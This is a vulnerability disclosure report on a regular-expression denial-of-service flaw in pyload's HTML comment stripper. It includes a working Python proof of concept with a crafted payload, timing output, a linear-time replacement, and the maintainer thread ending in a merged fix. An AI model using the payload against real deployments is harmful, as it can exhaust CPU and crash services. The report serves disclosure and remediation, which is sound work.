Inefficient Regular Expression Complexity in pyload/pyload

Valid

Reported on

Sep 20th 2021


✍️ Description

The pyload package is vulnerable to ReDoS (regular expression denial of service). An attacker who can supply crafted HTML comments as input to the comments function in utils/web/purge.py can make the application consume an excessive amount of CPU. The pinned lines linked below contain the vulnerable regex.

🕵️‍♂️ Proof of Concept

Reproducer where we’ve copied the relevant code:

https://github.com/pyload/pyload/blob/127beb0ea3b9c9c23991cbde7d83dc9d892d2d5c/src/pyload/core/utils/web/purge.py#L7
https://github.com/pyload/pyload/blob/127beb0ea3b9c9c23991cbde7d83dc9d892d2d5c/src/pyload/core/utils/web/purge.py#L12-L14

Put the below in a poc.py file and run it with python

```python
import time
import re

# Pattern copied from purge.py: with re.S the lazy ".*?" rescans to the end
# of the input for every "<!--" that has no closing "-->".
_RE_COMMENTS = re.compile(r"<!--.*?-->", flags=re.S)


def comments(value):
    """Removes HTML comments from a text string."""
    return _RE_COMMENTS.sub("", value).strip()


for i in range(1, 50000):
    start_time = time.perf_counter()
    # i*10000 unterminated comment openers followed by a single "-"
    payload = "<!--" * (i * 10000) + "-"
    comments(payload)
    # perf_counter() measures seconds, so the printed value is in seconds
    # even though the label below says "ms"
    stop_time = time.perf_counter() - start_time
    print("Payload.length: " + str(len(payload)) + ": " + str(stop_time) + " ms")
```

Check the Output:

Payload.length: 40001: 2.9121267 ms
Payload.length: 80001: 10.2797351 ms
Payload.length: 120001: 27.080219800000002 ms
Payload.length: 160001: 45.3576031 ms
Payload.length: 200001: 66.31825060000001 ms

💥 Impact

This vulnerability can exhaust system resources and lead to crashes.
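As an added example that is not part of the original report and is not pyload's own fix: the vulnerable pattern beside a hypothetical single-pass replacement, comments_linear, that produces the same output as the regex (each opener is paired with the first closer after it; an unterminated opener is left alone) but costs O(n) instead of O(n^2) on the PoC payload. The seconds_taken helper and the constructed payload are assumptions of this example.

```python
import re
import time

# Pattern as shipped in purge.py (see the pinned lines above). With re.S the
# lazy ".*?" is retried one character further for every "<!--" that has no
# closing "-->", so a payload of n unterminated openers costs O(n^2).
_RE_COMMENTS = re.compile(r"<!--.*?-->", flags=re.S)


def comments_vulnerable(value):
    """Original behaviour: strip <!-- ... --> comments via the regex."""
    return _RE_COMMENTS.sub("", value).strip()


def comments_linear(value):
    """Hypothetical replacement (not pyload's own fix): one forward scan.

    Same output as the regex version: each "<!--" is paired with the first
    "-->" after it, and an opener with no closer is left untouched. Every
    str.find() resumes from the previous position, so one call is
    O(len(value)) no matter how many openers the input contains.
    """
    out = []
    pos = 0
    while True:
        start = value.find("<!--", pos)
        if start == -1:
            break
        end = value.find("-->", start + 4)
        if end == -1:
            # No closer anywhere after this opener, so no later opener can
            # match either: stop instead of re-scanning the tail per opener.
            break
        out.append(value[pos:start])
        pos = end + 3
    out.append(value[pos:])
    return "".join(out).strip()


def seconds_taken(fn, value):
    """Wall-clock seconds for one call (perf_counter() returns seconds)."""
    t0 = time.perf_counter()
    fn(value)
    return time.perf_counter() - t0


if __name__ == "__main__":
    # Constructed payload with the same shape as the PoC, but small enough
    # that the vulnerable call still finishes quickly on a laptop.
    payload = "<!--" * 2500 + "-"
    print(f"regex : {seconds_taken(comments_vulnerable, payload):.4f} s")
    print(f"linear: {seconds_taken(comments_linear, payload):.4f} s")
```

The regex line grows roughly fourfold each time the payload doubles, while the linear line stays in the millisecond range.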

Occurrences

We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 months ago
Ziding Zhang
2 months ago

Admin


Hey ready-research, I've emailed the maintainers for you.

We have contacted a member of the pyload team and are waiting to hear back 2 months ago
pyload/pyload maintainer
2 months ago

Maintainer


Hello, I got your email. How do you suggest fixing this issue?

ready-research submitted a
2 months ago
ready-research
2 months ago

Researcher


@maintainer Submitted a patch.

Please validate this issue using Mark as valid and also please confirm the fix once it got merged.

pyload/pyload maintainer validated this vulnerability 2 months ago
ready-research has been awarded the disclosure bounty
The fix bounty is now up for grabs
pyload/pyload maintainer
2 months ago

Maintainer


@ready-research Where is the patch?

ready-research
2 months ago

Researcher


You can select my branch fix-redos.

@admin Can you please guide the maintainer?

Jamie Slome
2 months ago

Admin


@maintainer - please click the confirm fix button above, and follow the steps in the modal form.

When selecting who fixed the vulnerability, feel free to elect @ready-research.

ready-research submitted a
2 months ago
pyload/pyload maintainer confirmed that a fix has been merged on 0ff11b 2 months ago
ready-research has been awarded the fix bounty
purge.py#L7 has been validated